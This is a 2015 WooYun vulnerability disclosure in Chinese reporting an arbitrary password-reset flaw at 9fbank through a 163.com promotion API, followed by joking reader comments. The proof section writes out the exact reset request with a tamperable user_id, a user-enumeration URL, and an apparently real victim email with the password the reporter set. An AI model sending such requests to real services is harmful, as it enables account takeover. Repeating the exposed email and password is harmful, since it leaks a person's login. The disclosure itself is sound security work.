当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104180

漏洞标题:玖富网任意账户密码重置漏洞

相关厂商:9fbank.com

漏洞作者: 小川

提交时间:2015-03-27 14:13

修复时间:2015-05-11 14:14

公开时间:2015-05-11 14:14

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

说到密码重置,大家都会想到的是找回密码的地方,但是再牛逼的系统,也防不住猪一样的队友啊!

详细说明:

ragecomic.png

漏洞证明:

活动:
http://9f.go.163.com/
设置密码的post请求:
http://163.welicai.com/wlcapi/2.0/163/setloginpwd.html
参数:
user_id=418608&password=wc12345&rePassword=wc12345
遍历到的用户:
http://163.welicai.com/wlcapi/2.0/163/checkPay.html?productId=143&amount=500.00&wlcMemberId=418608&orderNo=4c8f0469b52e915ba51751c23ea397ab
重置后的账户:
dongxin20050101@163.com wc12345

修复方案:

重置密码请求应当携带hash值,验证hash值与user_id是否匹配。实名认证有同样问题,不再证明

版权声明:转载请注明来源 小川@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评论

  1. 2015-03-27 14:22 | 90Snake ( 普通白帽子 | Rank:109 漏洞数:42 | 最大的漏洞就是人)

    越权修改?

  2. 2015-03-27 14:26 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    我是来看暴漫的

  3. 2015-03-27 14:46 | Noxxx ( 普通白帽子 | Rank:509 漏洞数:41 )

    我是来看暴漫的

  4. 2015-03-27 16:32 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    有瞒报没??

  5. 2015-03-27 17:01 | 忽然之间 ( 普通白帽子 | Rank:802 漏洞数:131 | 空白格)

    我也来看暴漫

  6. 2015-03-27 17:11 | sqlfeng ( 普通白帽子 | Rank:109 漏洞数:22 | 谁送我HHKB,我就嫁给她!)

    又有暴漫看了

  7. 2015-03-27 23:54 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    我是来看暴漫的

  8. 2015-03-28 12:27 | nonsafety ( 路人 | Rank:2 漏洞数:2 | 菜鸟)

    坐等看暴漫!

  9. 2015-04-01 15:29 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    客服竟然把我当骗子..........我的心好痛

  10. 2015-04-01 19:29 | mikecracker ( 路人 | Rank:6 漏洞数:3 | none of my business)

    @小川 WHAT?

  11. 2015-04-01 20:24 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @小川 哈哈哈,主要是你挑的这个日子不对....

  12. 2015-04-01 22:46 | mikecracker ( 路人 | Rank:6 漏洞数:3 | none of my business)

    @niliu 有道理

  13. 2015-04-06 13:34 | 孤独行者 ( 普通白帽子 | Rank:110 漏洞数:44 | 时光如水,总是无言。你若安好,便是晴天)

    @小川 哈哈哈哈。。。怕客服把乌云注册邮件也当初骗子了、。//